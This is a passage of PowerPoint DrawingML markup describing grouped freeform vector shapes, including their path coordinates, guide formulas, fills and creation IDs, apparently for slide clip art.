                  <a:gd name="T8" fmla="*/ 0 w 4041"/>
                  <a:gd name="T9" fmla="*/ 1084 h 38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41" h="3855">
                    <a:moveTo>
                      <a:pt x="0" y="1084"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="3855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="2770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1084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969696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792" name="Group 1156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806293B9-35F7-4187-8AF8-C5C77522ED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47" y="1722"/>
                <a:ext cx="434" cy="962"/>
                <a:chOff x="1547" y="1722"/>
                <a:chExt cx="434" cy="962"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="793" name="Freeform 1157">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C7ADAF-241A-4B38-8EA5-C2FB53B6CF4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574" y="1758"/>
                  <a:ext cx="381" cy="920"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 794"/>
                    <a:gd name="T1" fmla="*/ 213 h 1916"/>
                    <a:gd name="T2" fmla="*/ 0 w 794"/>
                    <a:gd name="T3" fmla="*/ 1916 h 1916"/>
                    <a:gd name="T4" fmla="*/ 794 w 794"/>
                    <a:gd name="T5" fmla="*/ 1703 h 1916"/>
                    <a:gd name="T6" fmla="*/ 794 w 794"/>
                    <a:gd name="T7" fmla="*/ 0 h 1916"/>
                    <a:gd name="T8" fmla="*/ 0 w 794"/>
                    <a:gd name="T9" fmla="*/ 213 h 19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94" h="1916">
                      <a:moveTo>
                        <a:pt x="0" y="213"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1916"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="1703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="213"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B6B6B6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94" name="Freeform 1158">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE2BA28-858A-42FD-ACAD-25C8B6368B2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12" y="2228"/>
                  <a:ext cx="27" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 14 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 26 w 57"/>
                    <a:gd name="T7" fmla="*/ 66 h 73"/>
                    <a:gd name="T8" fmla="*/ 26 w 57"/>
                    <a:gd name="T9" fmla="*/ 26 h 73"/>
                    <a:gd name="T10" fmla="*/ 57 w 57"/>
                    <a:gd name="T11" fmla="*/ 19 h 73"/>
                    <a:gd name="T12" fmla="*/ 57 w 57"/>
                    <a:gd name="T13" fmla="*/ 0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7" h="73">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="19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95" name="Freeform 1159">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32C849E7-1FCB-4D5C-B8DA-A571458E9B4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547" y="1841"/>
                  <a:ext cx="27" cy="843"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 1755"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 817 h 1755"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 817 h 1755"/>
                    <a:gd name="T6" fmla="*/ 0 w 57"/>
                    <a:gd name="T7" fmla="*/ 817 h 1755"/>
                    <a:gd name="T8" fmla="*/ 0 w 57"/>
                    <a:gd name="T9" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T12" fmla="*/ 0 w 57"/>
                    <a:gd name="T13" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T14" fmla="*/ 0 w 57"/>
                    <a:gd name="T15" fmla="*/ 1755 h 1755"/>
                    <a:gd name="T16" fmla="*/ 57 w 57"/>
                    <a:gd name="T17" fmla="*/ 1738 h 1755"/>
                    <a:gd name="T18" fmla="*/ 57 w 57"/>
                    <a:gd name="T19" fmla="*/ 47 h 1755"/>
                    <a:gd name="T20" fmla="*/ 0 w 57"/>
                    <a:gd name="T21" fmla="*/ 0 h 1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7" h="1755">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1755"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="1738"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="4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96" name="Freeform 1160">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34970D51-CF25-476C-B230-C99415EF86D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547" y="1723"/>
                  <a:ext cx="434" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 851 w 905"/>
                    <a:gd name="T1" fmla="*/ 14 h 288"/>
                    <a:gd name="T2" fmla="*/ 0 w 905"/>
                    <a:gd name="T3" fmla="*/ 241 h 288"/>
                    <a:gd name="T4" fmla="*/ 57 w 905"/>
                    <a:gd name="T5" fmla="*/ 288 h 288"/>
                    <a:gd name="T6" fmla="*/ 851 w 905"/>
                    <a:gd name="T7" fmla="*/ 76 h 288"/>
                    <a:gd name="T8" fmla="*/ 905 w 905"/>
                    <a:gd name="T9" fmla="*/ 0 h 288"/>
                    <a:gd name="T10" fmla="*/ 851 w 905"/>
                    <a:gd name="T11" fmla="*/ 14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05" h="288">
                      <a:moveTo>
                        <a:pt x="851" y="14"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="905" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="14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97" name="Freeform 1161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D6770F4-551E-406C-A422-1F99613F9CF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955" y="1722"/>
                  <a:ext cx="26" cy="852"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 54"/>
                    <a:gd name="T1" fmla="*/ 75 h 1774"/>
                    <a:gd name="T2" fmla="*/ 0 w 54"/>
                    <a:gd name="T3" fmla="*/ 838 h 1774"/>
                    <a:gd name="T4" fmla="*/ 0 w 54"/>
                    <a:gd name="T5" fmla="*/ 838 h 1774"/>
                    <a:gd name="T6" fmla="*/ 0 w 54"/>
                    <a:gd name="T7" fmla="*/ 838 h 1774"/>
                    <a:gd name="T8" fmla="*/ 0 w 54"/>
                    <a:gd name="T9" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T10" fmla="*/ 0 w 54"/>
                    <a:gd name="T11" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T12" fmla="*/ 0 w 54"/>
                    <a:gd name="T13" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T14" fmla="*/ 0 w 54"/>
                    <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                    <a:gd name="T16" fmla="*/ 54 w 54"/>
                    <a:gd name="T17" fmla="*/ 1760 h 1774"/>
                    <a:gd name="T18" fmla="*/ 54 w 54"/>
                    <a:gd name="T19" fmla="*/ 0 h 1774"/>
                    <a:gd name="T20" fmla="*/ 0 w 54"/>
                    <a:gd name="T21" fmla="*/ 75 h 17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4" h="1774">
                      <a:moveTo>
                        <a:pt x="0" y="75"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="1760"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="0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rgbClr val="A0A0A0"/>
                </a:soli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69" name="Group 1472">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5A418C-4923-48F0-B2D0-ABC53E523D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40829" y="5282471"/>
              <a:ext cx="543835" cy="403452"/>
              <a:chOff x="2220" y="2422"/>
              <a:chExt cx="461" cy="342"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="757" name="Group 1229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{397AEC69-D853-4F97-8CC2-5E3888592D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82" y="2435"/>
                <a:ext cx="154" cy="264"/>
                <a:chOff x="1971" y="1822"/>
                <a:chExt cx="154" cy="264"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="785" name="Freeform 1118">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A6E7658-E323-48F6-BCAB-2FEB592A463A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1971" y="1865"/>
                  <a:ext cx="154" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="29" y="102"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="108"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="65"/>
                        <a:pt x="111" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="117"/>
                        <a:pt x="109" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="165"/>
                        <a:pt x="112" y="170"/>
                        <a:pt x="119" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="173"/>
                        <a:pt x="162" y="183"/>
                        <a:pt x="169" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="186"/>
                        <a:pt x="193" y="176"/>
                        <a:pt x="196" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="163"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="209" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="154"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="141"/>
                        <a:pt x="237" y="135"/>
                        <a:pt x="237" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="96"/>
                        <a:pt x="198" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="123"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="193" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="193" y="73"/>
                        <a:pt x="193" y="7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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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86" name="Freeform 1119">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D970B980-36FA-4B63-8865-B651BD94AB4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048" y="1857"/>
                  <a:ext cx="42" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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5"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="48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87" name="Freeform 1120">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42BC1A7-7787-4406-B77D-2346B0E61F6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995" y="1968"/>
                  <a:ext cx="103" cy="118"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 159 w 159"/>
                    <a:gd name="T1" fmla="*/ 6 h 180"/>
                    <a:gd name="T2" fmla="*/ 132 w 159"/>
                    <a:gd name="T3" fmla="*/ 21 h 180"/>
                    <a:gd name="T4" fmla="*/ 81 w 159"/>
                    <a:gd name="T5" fmla="*/ 11 h 180"/>
                    <a:gd name="T6" fmla="*/ 72 w 159"/>
                    <a:gd name="T7" fmla="*/ 0 h 180"/>
                    <a:gd name="T8" fmla="*/ 68 w 159"/>
                    <a:gd name="T9" fmla="*/ 19 h 180"/>
                    <a:gd name="T10" fmla="*/ 17 w 159"/>
                    <a:gd name="T11" fmla="*/ 32 h 180"/>
                    <a:gd name="T12" fmla="*/ 1 w 159"/>
                    <a:gd name="T13" fmla="*/ 55 h 180"/>
                    <a:gd name="T14" fmla="*/ 1 w 159"/>
                    <a:gd name="T15" fmla="*/ 145 h 180"/>
                    <a:gd name="T16" fmla="*/ 36 w 159"/>
                    <a:gd name="T17" fmla="*/ 156 h 180"/>
                    <a:gd name="T18" fmla="*/ 43 w 159"/>
                    <a:gd name="T19" fmla="*/ 145 h 180"/>
                    <a:gd name="T20" fmla="*/ 42 w 159"/>
                    <a:gd name="T21" fmla="*/ 73 h 180"/>
                    <a:gd name="T22" fmla="*/ 42 w 159"/>
                    <a:gd name="T23" fmla="*/ 73 h 180"/>
                    <a:gd name="T24" fmla="*/ 42 w 159"/>
                    <a:gd name="T25" fmla="*/ 72 h 180"/>
                    <a:gd name="T26" fmla="*/ 42 w 159"/>
                    <a:gd name="T27" fmla="*/ 66 h 180"/>
                    <a:gd name="T28" fmla="*/ 42 w 159"/>
                    <a:gd name="T29" fmla="*/ 64 h 180"/>
                    <a:gd name="T30" fmla="*/ 42 w 159"/>
                    <a:gd name="T31" fmla="*/ 63 h 180"/>
                    <a:gd name="T32" fmla="*/ 59 w 159"/>
                    <a:gd name="T33" fmla="*/ 41 h 180"/>
                    <a:gd name="T34" fmla="*/ 103 w 159"/>
                    <a:gd name="T35" fmla="*/ 30 h 180"/>
                    <a:gd name="T36" fmla="*/ 103 w 159"/>
                    <a:gd name="T37" fmla="*/ 30 h 180"/>
                    <a:gd name="T38" fmla="*/ 59 w 159"/>
                    <a:gd name="T39" fmla="*/ 41 h 180"/>
                    <a:gd name="T40" fmla="*/ 42 w 159"/>
                    <a:gd name="T41" fmla="*/ 63 h 180"/>
                    <a:gd name="T42" fmla="*/ 42 w 159"/>
                    <a:gd name="T43" fmla="*/ 71 h 180"/>
                    <a:gd name="T44" fmla="*/ 42 w 159"/>
                    <a:gd name="T45" fmla="*/ 72 h 180"/>
                    <a:gd name="T46" fmla="*/ 42 w 159"/>
                    <a:gd name="T47" fmla="*/ 77 h 180"/>
                    <a:gd name="T48" fmla="*/ 42 w 159"/>
                    <a:gd name="T49" fmla="*/ 77 h 180"/>
                    <a:gd name="T50" fmla="*/ 43 w 159"/>
                    <a:gd name="T51" fmla="*/ 154 h 180"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 154 h 180"/>
                    <a:gd name="T54" fmla="*/ 43 w 159"/>
                    <a:gd name="T55" fmla="*/ 157 h 180"/>
                    <a:gd name="T56" fmla="*/ 84 w 159"/>
                    <a:gd name="T57" fmla="*/ 157 h 180"/>
                    <a:gd name="T58" fmla="*/ 85 w 159"/>
                    <a:gd name="T59" fmla="*/ 77 h 180"/>
                    <a:gd name="T60" fmla="*/ 89 w 159"/>
                    <a:gd name="T61" fmla="*/ 69 h 180"/>
                    <a:gd name="T62" fmla="*/ 141 w 159"/>
                    <a:gd name="T63" fmla="*/ 55 h 180"/>
                    <a:gd name="T64" fmla="*/ 159 w 159"/>
                    <a:gd name="T65" fmla="*/ 25 h 180"/>
                    <a:gd name="T66" fmla="*/ 159 w 159"/>
                    <a:gd name="T67" fmla="*/ 8 h 180"/>
                    <a:gd name="T68" fmla="*/ 159 w 159"/>
                    <a:gd name="T69" fmla="*/ 6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9" h="180">
                      <a:moveTo>
                        <a:pt x="159" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="17"/>
                        <a:pt x="140" y="23"/>
                        <a:pt x="132" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="20"/>
                        <a:pt x="94" y="14"/>
                        <a:pt x="81" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="10"/>
                        <a:pt x="73" y="5"/>
                        <a:pt x="72" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="19"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="68" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
